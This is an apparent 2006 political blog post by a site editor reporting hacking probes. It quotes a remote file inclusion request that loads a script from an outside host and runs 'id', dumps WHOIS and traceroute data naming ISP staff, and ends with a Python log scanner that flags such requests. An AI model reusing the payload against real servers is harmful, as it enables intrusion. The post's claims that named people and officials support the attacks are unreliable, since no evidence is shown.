Like Texas radio, comin' in cool and slow across the swamps with IP addresses from Turkey and Iran. Their hacking "tools" are stashed in Texas and Georgia, and their URLs look like this: http://trendysims2.altervista.org/forum/admin/tool25.dat?cmd=id /modules/My_eGallery/public/displayCategory.php?basepath=http://trendysims2.altervista.org/forum/admin/tool25. Let it be known that shit like that doesn't work anymore, and visitors who fish for non-existent URLs on my websites stand out like phosphorescent flamingos.
Someday I'll have to tell you about the fools with IP addresses from Tehran who stashed their tool in a cheerleader website - a few minutes down the road from Fort Benning, Georgia. Please take the link for a clue about what is happening to independent media sites around the world. It is not too different from the rampant crimes committed against blacks in the 60s when the rednecks knew that the FBI was standing down, insofar as crimes against civil rights activists were concerned. At least they can't murder us with data packets, but they are prepared to unleash billions of them on political targets. Fortunately for us, these malefactors are stupid lamers who barely know how to type. Like the Leesburg Mafia of Halliburton fame, they're a lot more effective when they're up close and personal, breaking someone's legs.
This new breed of hacker belongs to the world of corporate enforcers hired by corporations like Chiquita Brands and KBR, and their style fits the Republican mold of silencing all voices but theirs. Their history goes back at least as far as the attempt by Jerry Ford to veto the Freedom of Information Act: it became law when Congress overrode his veto. Before him, Richard Nixon became impatient when the CIA couldn't readily come up with bagmen to suit his self-serving political purposes.
Cowboy Bush has topped them all - and has tried to make rampant lawlessness the law of the land, by allowing the "intelligence" agencies to hire criminals off the street for domestic spying operations. In related instances from the era of the Chicago Red Squad, surveillance has always been accompanied by harassment. In fact, the purpose of setting up domestic surveillance has been to provide an opportunity to harass political opponents. Surveil and control: that is politics today, as played by a new wave of far-right wingnuts. But like the Gang That Couldn't Shoot Straight, they are just too stupid to pull it off. So here I give you the dossier of yet another pack of LAMERS: this time housed in the friendly confines of Everyone's Internet in Houston, Texas, where I find the all too familiar names of Valarie Stinson and Randy Williams listed as technicians.
Altervista.org has been around for long enough that these guys ought to know what kind of mayhem they are supporting with the multiple IP addresses and bandwidth they have provided - the latest data follows at the end of this story.
David Roknich, Editor,
DOGSPOT
OrgName: Everyones Internet
OrgID: EVRY
Address: 390 Benmar
Address: Suite 200
City: Houston
StateProv: TX
PostalCode: 77060
Country: US
NetRange: 67.15.0.0 - 67.15.255.255
CIDR: 67.15.0.0/16
NetName: EVRY-BLK-15
NetHandle: NET-67-15-0-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.EV1.NET
NameServer: NS2.EV1.NET
Comment:
RegDate: 2004-02-06
Updated: 2005-12-16
RTechHandle: RW172-ARIN
RTechName: Williams, Randy
RTechPhone: +1-713-579-2850
RTechEmail: admin@ev1.net
OrgAbuseHandle: ABUSE477-ARIN
OrgAbuseName: ABUSE
OrgAbusePhone: +1-713-579-2850
OrgAbuseEmail: abuse@ev1.net
OrgNOCHandle: NOC1445-ARIN
OrgNOCName: NOC
OrgNOCPhone: +1-713-579-2850
OrgNOCEmail: noc@ev1.net
OrgTechHandle: RW172-ARIN
OrgTechName: Williams, Randy
OrgTechPhone: +1-713-579-2850
OrgTechEmail: admin@ev1.net
OrgTechHandle: VST3-ARIN
OrgTechName: Stinson, Valarie
OrgTechPhone: +1-713-579-2850
OrgTechEmail: admin2@ev1.net
# ARIN WHOIS database, last updated 2006-05-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
DNS records
| name | class | type | data | time to live |
| trendysims2.altervista.org | IN | A | 67.15.38.79 | 86361s (23:59:21) |
| altervista.org | IN | SOA | server: ns1.altervista.org; email: hostmaster.altervista.org; serial: 201437419; refresh: 28800; retry: 7200; expire: 2419200; minimum ttl: 86400 | 86400s (1.00:00:00) |
| altervista.org | IN | NS | ns2.altervista.org | 86400s (1.00:00:00) |
| altervista.org | IN | NS | ns3.altervista.org | 86400s (1.00:00:00) |
| altervista.org | IN | NS | ns1.altervista.org | 86400s (1.00:00:00) |
| altervista.org | IN | A | 216.127.94.127 | 86400s (1.00:00:00) |
| altervista.org | IN | MX | preference: 0; exchange: mail.redirection.net | 86400s (1.00:00:00) |
| 79.38.15.67.in-addr.arpa | IN | PTR | ns11.altervista.org | 7161s (01:59:21) |
Traceroute
Tracing route to trendysims2.altervista.org [67.15.38.79]...
| hop | rtt | rtt | rtt | ? | ip address | fully qualified domain name |
| 1 | 0 | 0 | 0 | ? | 216.46.228.229 | port-216-3073253-es128.devices.datareturn.com |
| 2 | 0 | 0 | 0 | ? | 64.29.192.145 | port-64-1949841-zzt0prespect.devices.datareturn.com |
| 3 | 0 | 0 | 0 | ? | 64.29.192.226 | daa.g921.ispb.datareturn.com |
| 4 | 0 | 0 | 0 | ? | 168.215.241.133 | hagg-01-ae0-1001.dlfw.twtelecom.net |
| 5 | 0 | 0 | 0 | ? | 66.192.246.217 | core-02-ge-3-1-3-503.dlfw.twtelecom.net |
| 6 | 5 | 5 | 5 | ? | 66.192.246.19 | dist-01-so-1-0-0-0.hsto.twtelecom.net |
| 7 | 77 | 62 | 5 | ? | 66.192.246.123 | hagg-02-ge-0-3-0-505.hsto.twtelecom.net |
| 8 | 7 | 7 | 7 | ? | 216.110.27.98 | 216-110-27-98.static.twtelecom.net |
| 9 | 9 | 9 | 9 | ? | 66.98.241.29 | gphou-66-98-241-29.ev1.net |
Trace aborted
and that's not all: here's a typical attack IP
Address lookup
Domain Whois record
Queried whois.metu.edu.tr with "ttnet.net.tr"...
** Registrant:
Turk Telekominikasyon A.S.
TT Gen.Mud.Bilisim Aglari Dairesi Turgur Ozal Bul.
06103
Ankara,
Turkiye
ipg@turktelekom.com.tr
+ 90-312-3131937-
+ 90-312-3131924
** Administrative Contact:
Nick Handle : tta6-metu
Person : Turk Telekomunikasyon A.S. Temsilcisi
Organization Name : Turk Telekomunikasyon A.S.
Address : TT Gen . Mud. Bilisim Aglari Dairesi
Turgut Ozal Bulv. AYDINLIKEVLER
Ankara,06103
Turkiye
Phone : + 90-312-3131922-
Fax : + 90-312-3131924
** Technical Contact:
Nick Handle : tta6-metu
Person : Turk Telekomunikasyon A.S. Temsilcisi
Organization Name : Turk Telekomunikasyon A.S.
Address : TT Gen . Mud. Bilisim Aglari Dairesi
Turgut Ozal Bulv. AYDINLIKEVLER
Ankara,06103
Turkiye
Phone : + 90-312-3131922-
Fax : + 90-312-3131924
** Billing Contact:
Nick Handle : tta6-metu
Person : Turk Telekomunikasyon A.S. Temsilcisi
Organization Name : Turk Telekomunikasyon A.S.
Address : TT Gen . Mud. Bilisim Aglari Dairesi
Turgut Ozal Bulv. AYDINLIKEVLER
Ankara,06103
Turkiye
Phone : + 90-312-3131922-
Fax : + 90-312-3131924
** Domain Servers:
ns1.ttnet.net.tr 212.156.4.4
ns2.ttnet.net.tr 212.156.4.20
** Additional Info:
Created on..............: 1998-May-08.
Expires on..............: 2007-May-07.
Network Whois record
Queried whois.ripe.net with "-B 85.98.213.195"...
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http://www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Information related to '85.98.144.0 - 85.98.255.255'
inetnum: 85.98.144.0 - 85.98.255.255
netname: TurkTelekom
descr: Turk Telekom ADSL-meteksan_2
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ipg@telekom.gov.tr
changed: ipg@telekom.gov.tr 20050620
source: RIPE
role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: abuse@ttnet.net.tr
admin-c: BADB3-RIPE
tech-c: ZA66-RIPE
tech-c: ZA196-RIPE
tech-c: LA109-RIPE
tech-c: NO638-RIPE
nic-hdl: TTBA1-RIPE
notify: ipg@turktelekom.com.tr
mnt-by: AS9121-MNT
changed: ipg@telekom.gov.tr 20000608
changed: ipg@telekom.gov.tr 20001020
changed: ipg@telekom.gov.tr 20010615
changed: ipg@turktelekom.com.tr 20040903
source: RIPE
% Information related to '85.98.128.0/17AS9121'
route: 85.98.128.0/17
descr: TurkTelecom
origin: AS9121
mnt-by: AS9121-MNT
changed: ipg@turktelekom.com.tr 20041214
source: RIPE
DNS records
DNS query for dsl85-98-54723.ttnet.net.tr returned an error from the server: NameError
| name | class | type | data | time to live |
| ttnet.net.tr | IN | TXT | v=spf1 a mx ptr a:212.175.13.129 mx:212.175.14.134 ~all | 10300s (02:51:40) |
| ttnet.net.tr | IN | SOA | server: eylul1.ttnet.net.tr; email: ipg.telekom.gov.tr; serial: 2006050402; refresh: 10800; retry: 7200; expire: 216000; minimum ttl: 10300 | 10300s (02:51:40) |
| ttnet.net.tr | IN | NS | ns1.ttnet.net.tr | 10300s (02:51:40) |
| ttnet.net.tr | IN | NS | ns2.ttnet.net.tr | 10300s (02:51:40) |
| ttnet.net.tr | IN | MX | preference: 10; exchange: ttfarm.ttnet.net.tr | 20800s (05:46:40) |
| ttnet.net.tr | IN | A | 212.175.13.37 | 10300s (02:51:40) |
| 195.213.98.85.in-addr.arpa | IN | PTR | dsl85-98-54723.ttnet.net.tr | 86375s (23:59:35) |
Traceroute
Tracing route to dsl85-98-54723.ttnet.net.tr [85.98.213.195]...
| hop | rtt | rtt | rtt | ? | ip address | fully qualified domain name |
| 1 | 0 | 0 | 0 | ? | 216.46.228.229 | port-216-3073253-es128.devices.datareturn.com |
| 2 | 0 | 0 | 0 | ? | 64.29.192.145 | port-64-1949841-zzt0prespect.devices.datareturn.com |
| 3 | 0 | 0 | 0 | ? | 64.29.192.226 | daa.g921.ispb.datareturn.com |
| 4 | 0 | 0 | 0 | ? | 168.215.241.133 | hagg-01-ae0-1001.dlfw.twtelecom.net |
| 5 | 0 | 0 | 1 | ? | 66.192.253.124 | core-02-ge-3-1-0-504.dlfw.twtelecom.net |
| 6 | 34 | 34 | 34 | ? | 66.192.255.19 | core-01-so-0-0-0-0.asbn.twtelecom.net |
| 7 | 34 | 34 | 37 | ? | 66.192.255.229 | peer-01-so-0-0-0-0.asbn.twtelecom.net |
| 8 | 56 | 56 | 56 | ? | 206.223.115.19 | equinix-was.ip.tiscali.net |
| 9 | 130 | 146 | 129 | ? | 213.200.82.182 | so-1-0-0.par77.ip.tiscali.net |
| 11 | 185 | 185 | 185 | ? | 212.156.118.249 | gyt_t1_1-gyt-ebgp.ttnet.net.tr |
| 12 | 197 | 198 | 197 | ? | 212.156.120.30 | izm_t1_1-gyt_t1_1.ttnet.net.tr |
| 15 | 219 | 217 | 218 | ? | 85.98.213.195 | dsl85-98-54723.ttnet.net.tr |
Trace complete
The hack attempt was well documented enough above for an educated reader.
They addressed a well-known "hackers tool" at another site in an attempt to use it on a non-existent URL on my website.
Essentially, a string of commands was entered into the address bar of a web browser
(I can tell you what browser was used, from my logs)
with the intent of acquiring administrative privileges on my server.
I don't take this lightly: the new draconian laws drafted by the junta of our current hacker-and-thief in the Whore House on Pennsylvania Avenue consider it to be "computer terrorism".
The string of commands can be read in the original text of my post.
It is common for teenagers to attempt these things, albeit lame.
But when grown men do it with impunity on the public's time it is intolerable.
Some of them have spent large sums of money acquiring 1000s of IP addresses so they can use them against websites that spread information that is intentionally buried by their operatives within the news media.
This is a phenomenon that needs to be made well known in a nation that aspires to democracy. I have done my best in this regard. I recently had to block
(excuse the pun) 16,000 addresses purchased by a hacker in Santa Clara that were being sequentially deployed against my website.
Ask Michael Rupert and others how difficult it is to promulgate the news these days, and how much they have to spend on computer security.
I might also add that various sorts of physical attacks have precisely coincided with "visits to my website by IP addresses I don't like".
And by the way, "I don't like you" might have special meaning to a naive "cyber warrior" in the service of the empire because that is one of the responses you will get if you try to enter illegal commands into the interactive software used at my news sites.
Some of these lamers are employed by the State of California - they are the same people being sued for stalking the Raging Grannies and others are on the police force of allegedly liberal Soquel, California where they are assisted by the self-styled anti-terrorist Mr. Jeffries at the local shopping mall where he and the local cops get their jollies by filming attractive female protesters from the roof of the mall ON THE TAXPAYER'S DIME.
Is the air a little clearer now? Turn on the fan if I haven't blown out all of your DISINFORMATION.
sieg heil and have a nice republican day!
David Roknich,
Editor,
DOGSPOT
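
Added example, not part of the original post: the request quoted at the top puts a full http:// URL into the basepath parameter of a script path that does not exist on the site, which is why it stands out in the logs. The Python sketch below flags such requests in an access log; the Combined Log Format, the sample lines, the documentation IP addresses and the host remote.example are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A query parameter whose value is itself an absolute URL is the tell.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def remote_url_params(target):
    """Return names of query parameters whose decoded value starts with a URL scheme."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time to catch double encoding.
        if REMOTE_RE.match(value) or REMOTE_RE.match(unquote(value)):
            hits.append(name)
    return hits


def find_probes(lines):
    """Map client IP -> list of (status, path, parameter) for flagged requests."""
    probes = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        path = urlsplit(m['target']).path
        for name in remote_url_params(m['target']):
            probes[m['ip']].append((int(m['status']), path, name))
    return dict(probes)


# Constructed sample lines; only the script path comes from the post above.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2006:19:10:00 +0000] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://remote.example/tool.dat?cmd=id HTTP/1.1" 404 208 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [10/May/2006:19:10:02 +0000] "GET /index.php?page=http%253A%252F%252Fremote.example%252Fx.txt HTTP/1.1" 404 208 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/May/2006:19:11:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in find_probes(SAMPLE_LOG).items():
        print(ip, hits)
```

A 200 status on a flagged request deserves a closer look than a 404. Legitimate redirect parameters that carry URLs will also match and need an allow-list.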